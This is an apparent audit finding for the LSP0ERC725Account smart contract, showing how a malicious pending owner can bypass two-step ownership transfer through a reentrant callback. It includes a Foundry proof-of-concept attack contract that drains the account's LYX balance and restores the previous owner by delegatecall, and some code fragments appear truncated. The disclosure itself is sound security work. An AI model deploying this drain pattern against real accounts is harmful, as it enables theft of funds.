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HistoryJul 14, 2023 - 12:00 a.m.

Two-step ownership transfer process in LSP0ERC725AccountCore can be bypassed

two-step ownership transfer
bypass vulnerability
account destruction

Lines of code

Vulnerability details

Bug Description

To transfer ownership of the LSP0ERC725AccountCore contract, the owner has to call transferOwnership() to nominate a pending owner. Afterwards, the pending owner must call acceptOwnership() to become the new owner.

When called by the owner, transferOwnership() executes the following logic:


        address currentOwner = owner();

        // If the caller is the owner perform transferOwnership directly
        if (msg.sender == currentOwner) {
            // set the pending owner
            emit OwnershipTransferStarted(currentOwner, pendingNewOwner);

            // notify the pending owner through LSP1

            // Require that the owner didn't change after the LSP1 Call
            // (Pending owner didn't automate the acceptOwnership call through LSP1)
                currentOwner == owner(),
                "LSP14: newOwner MUST accept ownership in a separate transaction"
        } else {

The currentOwner == owner() check ensures that pendingNewOwner did not call acceptOwnership() in the universalReceiver() callback. However, a malicious contract can bypass this check by doing the following in its universalReceiver() function:

  • Call acceptOwnership() to gain ownership of the LSP0 account.
  • Do whatever he wants, such as transferring the accountโ€™s entire LYX balance to himself.
  • Call execute() to perform a delegate call that does either of the following:
    • Delegate call into a contract that self-destructs, which will destroy the account permanently.
    • Otherwise, use delegate call to overwrite _owner to the previous owner.

This defeats the entire purpose of a two-step ownership transfer, which should ensure that the LSP0 account cannot be lost in a single call if the owner accidentally calls transferOwnership() with the wrong address.


Should transferOwnership() be called with the wrong address, the address could potentially bypass the two-step ownership transfer process to destroy the LSP0 account in a single transaction.

Proof of Concept

The following Foundry test demonstrates how an attacker can drain the LYX balance of an LSP0 account in a single transaction when set to the pending owner in transferOwnership():

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "forge-std/Test.sol";
import "../../../contracts/LSP0ERC725Account/LSP0ERC725Account.sol";

contract Implementation {
    // _owner is at slot 0 for LSP0ERC725Account
    address _owner; 

    function setOwner(address newOwner) external {
        _owner = newOwner;

contract MaliciousReceiver { 
    LSP0ERC725Account account;
    bool universalReceiverDisabled;
    constructor(LSP0ERC725Account _account) {
        account = _account;

    function universalReceiver(bytes32, bytes calldata) external returns (bytes memory) {
        // Disable universalReceiver() 
        universalReceiverDisabled = true;

        // Cache owner for later use
        address owner = account.owner();

        // Call acceptOwnership() to become the owner

        // Transfer all LYX balance to this contract
            0, // OPERATION_0_CALL
            10 ether,

        // Overwrite _owner with the previous owner using delegatecall
        Implementation implementation = new Implementation();
            4, // OPERATION_4_DELEGATECALL
            abi.encodeWithSelector(Implementation.setOwner.selector, owner)

        return "";

    function supportsInterface(bytes4) external view returns (bool) {
        return !universalReceiverDisabled;

    receive() payable external {}

contract TwoStepOwnership_POC is Test {
    LSP0ERC725Account account;

    function setUp() public {
        // Deploy LSP0 account with address(this) as owner and give it some LYX
        account = new LSP0ERC725Account(address(this));
        deal(address(account), 10 ether);

    function testCanDrainContractInTransferOwnership() public {
        // Attacker deploys malicious receiver contract
        MaliciousReceiver maliciousReceiver = new MaliciousReceiver(account);

        // Victim calls transferOwnership() for malicious receiver

        // All LYX in the account has been drained
        assertEq(address(account).balance, 0);
        assertEq(address(maliciousReceiver).balance, 10 ether);

Recommended Mitigation

Add a inTransferOwnership state variable, which ensures that acceptOwnership() cannot be called while transferOwnership() is in execution, similar to a reentrancy guard:

function transferOwnership(
    address pendingNewOwner
) public virtual override(LSP14Ownable2Step, OwnableUnset) {
    inTransferOwnership = true;

    // Some code here...

    inTransferOwnership = false;

function acceptOwnership() public virtual override {
    if (inTransferOwnership) revert CannotAcceptOwnershipDuringTransfer();

    // Some code here...

Assessed type


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